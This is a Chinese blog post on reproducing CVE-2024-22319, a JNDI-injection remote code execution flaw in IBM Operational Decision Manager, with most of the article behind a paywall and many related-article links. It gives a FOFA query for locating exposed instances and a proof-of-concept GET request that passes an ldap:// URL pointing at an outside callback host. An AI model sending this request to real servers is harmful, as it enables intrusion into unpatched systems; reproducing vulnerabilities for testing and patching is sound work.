【漏洞复现】IBM Operational Decision Manager JNDI注入漏洞(CVE-2024-22319)

最新推荐文章于 2024-05-23 15:08:02 发布
最新推荐文章于 2024-05-23 15:08:02 发布
阅读量353 收藏 3
点赞数 6
分类专栏: 漏洞复现 文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/136373846
版权

0x01 产品简介

IBM Operational Decision Manager是一个功能强大的决策管理平台,可简化决策的编写和编辑,具有追溯、模拟、版本控制和审计等企业级功能。

0x02 漏洞概述

IBM Operational Decision Manager 8.10.3、8.10.4、8.10.5.1、8.11、8.11.0.1 和 8.12.0.1 在将未经检查的参数传递给某个 API 时,容易受到通过 JNDI 注入进行的远程代码执行攻击。

0x03 测绘语句

fofa语句:title="IBM ODM"

0x04 漏洞复现

GET /decisioncenter-api/v1/about?datasource=ldap://cr75xy2yvof2dx9m3e47objfq6wyko8d.oastify.com HTTP/1.1

使用 burp自带的dnslog

了解本专栏 订阅专栏 解锁全文 超级会员免费看
从不学安全
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
WebSphere远程代码执行漏洞处置方案
文公子的博客
11-03 1502
WebSphere远程代码执行漏洞处置方案 2020年6月5日,IBM官方发布安全通告修复了WebSphere Application Server中的远程代码执行漏洞CVE-2020-4450),根据IBM官方通告,WebSphere Application Server存在一处IIOP反序列化漏洞,将会导致远程代码执行,未经身份认证的攻击者可以通过IIOP协议远程攻击WebSphere Application Server服务器。鉴于该漏洞影响较大,建议客户尽快安装软件更新。 漏洞描述 WebSphe
ibm服务器漏洞修复,IBM HTTP Server漏洞修复措施
weixin_36378232的博客
08-09 794
今天小编给大家分享一篇IBM HTTP Server漏洞修复措施,感兴趣的朋友跟小编一起来了解一下吧!涉及程序:GET描述:通过提交超长的GET请求导致IBM HTTP Server远程溢出详细:IBM 的 HTTP 服务器是一个 web 服务器。在 Windows NT 使用的版本中存在拒绝服务的漏洞。如果提交一个超过219个字符的 GET 请求,将导致服务器停止响应,并报错。要恢复服务正常工作...
Fail-Operational Safety Architecture for ADAS system
08-15
Fail-Operational Safety Architecture for ADAS system Considering Domain ECUs
A Practical Fail-Operational steering concept.pdf
08-15
A Practical Fail-Operational steering concept
How_to_secure_Operational_Technology_environments.pdf
08-28
How_to_secure_Operational_Technology_environments 区块链 区块链 安全 业务风控 漏洞分析
CVE-2006-0539漏洞复现
weixin_52355463的博客
05-19 101
受影响软件简介:Fcron是具有GNU 通用公共许可证(GNU GPL) 许可证的计算机程序,可执行周期性命令调度。它是在 Linux 上开发的,应该可以在POSIX系统上运行。与Anacron一样,它不假定系统是连续运行的,并且可以在不一直运行或不定期运行的系统中运行。在fcrontab程序中发现了缓冲区溢出,这是fcron 3.0.0的一部分,升级到fcron 3.0.1更安全,其中包括对这个漏洞的修复。通过使用过长的参数调用程序,本地攻击者可能会溢出缓冲区并导致系统崩溃或可能在系统上执行任意代码。
熔断&幽灵漏洞复现
qq_52504945的博客
04-23 2630
熔断,幽灵漏洞原理介绍及其复现
WebSphere漏洞总结复现
1ance's blog
11-14 8801
写在前面:本文为漏洞复现系列WebSphere篇,复现漏洞已vulhub中存在的环境为主。 欢迎大家点赞收藏,点点关注更好了hhhhhh 文章目录简介WebSphere反序列化(CVE-2015-7450)漏洞原理影响范围漏洞复现修复建议弱口令 && 后台Getshell漏洞原理影响范围漏洞复现修复建议CVE-2020-4450总结 简介 WebSphere® Application Server 加速交付新应用程序和服务,它可以通过快速交付创新的应用程序来帮助企业提供丰富的用户体验从基
常见中间件漏洞复现(上)
Askshhbs的博客
04-26 1001
面试的时候会经常问关于中间件的漏洞,这里做一下漏洞复现巩固一下 在虚拟机中安装docker环境具体就不演示了Vulhub - Docker-Compose file for vulnerability environment Tomcat漏洞 Tomcat 任意文件写入(CVE-2017-12615) 影响范围: Tomcat 7.0.0-7.0.81(默认配置) 测试环境:Apache Tomcat v8.5.39 漏洞本质:Tomcat配置文件/conf/web.xml 配置了可写(rea
IBM WebSphere 远程代码执行漏洞安全预警通告
内德
09-13 3904
       近日,IBM发布安全通告称修复了一个WebSphere Application Server中一个潜在的远程代码执行漏洞CVE-2018-1567)。攻击者可以构造一个恶意的序列化对象,随后通过SOAP连接器来执行任意JAVA代码.目前没有更多漏洞细节披露         该漏洞 CVSS 得分 9.8, 攻击者可在不经过身份认证的情况下远程对 We bSphere 服务器发起攻...
decisions-on-kafka:该示例显示如何在Kafka的消息驱动的体系结构中使用IBM ODM
05-26
此样本说明如何将IBM Operational Decision Manager(ODM)与Apache Kafka一起使用,Apache Kafka是一个分布式流平台,允许设置消息驱动的体系结构。 在样本的体系结构中,客户端应用程序发送贷款请求,并且决策...
operational-ui:有效操作界面的构建基块
05-06
操作界面组件@operational/components包包含简单,无状态的UI构建块-您的典型输入字段,按钮,卡片,网格等。 请参阅 。入门通过npm或yarn安装软件包: npm install @operational/components 像这样创建您的第一个...
内部控制和运营效率-研究论文
06-09
在这项研究中,我们研究了财务报告的内部控制是否会影响公司的运营效率。 我们发现,从前沿分析得出的运营效率,在内部控制存在重大弱点的公司中,相对于没有这些弱点的公司而言,其运营效率明显较低。...
永恒之蓝ms17-010漏洞利用复现
qq_45884775的博客
04-15 3510
一、永恒之蓝简述: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 二、SMB服务简述: SMB(全称是Server Message Block)是一个协议名
CoppeliaSim(V-Rep)和ROS2的使用说明
zhangrelay的专栏
12-02 6689
这篇教程简要说明,在CoppeliaSim仿真环境中,使用ROS2接口,如果是ROS 2 Dashing,直接使用安装包中的compiledRosPlugins文件夹下的libsimExtROS2Interface.so。 如果使用其他版本的ROS 2,需要手动编译生成.so文件,否则会出错。当然也支持ROS 1参考之前博文。 重新编译ROS 2之CoppeliaSim插件的过程如下所示:...
【Linux安全】Firewalld防火墙基础
最新发布
weixin_62922268的博客
05-23 415
支持网络区域所定义的网络链接以及接口安全等级的动态防火墙管理工具支持IPv4、IPv6防火墙设置以及以太网桥支持服务或应用程序直接添加防火墙规则接口拥有两种配置模式运行时配置永久配置trusted(信任区域):允许所有的传入流量。public(公共区域):允许与ssh或dhcpv6-client预定义服务匹配的传入流量,其余均拒绝。是新添加网络接口的默认区域。external(外部区域):允许与 ssh 预定义服务匹配的传入流量,其余均拒绝。
服务器漏洞安全修复记录
lxw1844912514的博客
05-22 354
Redis中线上使用keys *命令是非常危险的,应该禁用或者限制使用这些危险的命令,可降低Redis写入文件漏洞的入侵风险。描述:设置密码失效时间,强制定期修改密码,减少密码被泄漏和猜测风险,使用非密码登陆方式(如密钥对)请忽略此项。例如,在一个简单的 bash 脚本中,你可以检查用户输入的命令,如果是。重命名为一个难以猜测的命令,以此来减少恶意用户利用默认命令执行未授权操作的风险。但是,需要注意的是,Redis 并没有提供完全禁用命令的机制。命令,你可以考虑修改 Redis 源代码,从源头上移除。
F5发布2024年5月季度安全通告
2401_84434570的博客
05-22 1158
F5 BIG-IP Next Central Manager OData注入漏洞。F5 BIG-IP Next Central Manager SQL注入漏洞。F5 BIG-IP Next Central Manager中间人攻击漏洞。F5 BIG-IP Next Central Manager中间人攻击漏洞。F5 BIG-IP APM浏览器网络访问VPN客户端来源验证错误漏洞。F5 BIG-IP Next CNF信息泄露漏洞。F5 BIG-IP配置实用程序跨站脚本漏洞
fail-operational fail-safe
04-28
“Fail-operational fail-safe”是指在某种系统中,当某些组件出现故障时,该系统仍然能够正常运行且保持安全。其涉及到两种模式:fail-operational模式和fail-safe模式。 在fail-operational模式下,无论某些组件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值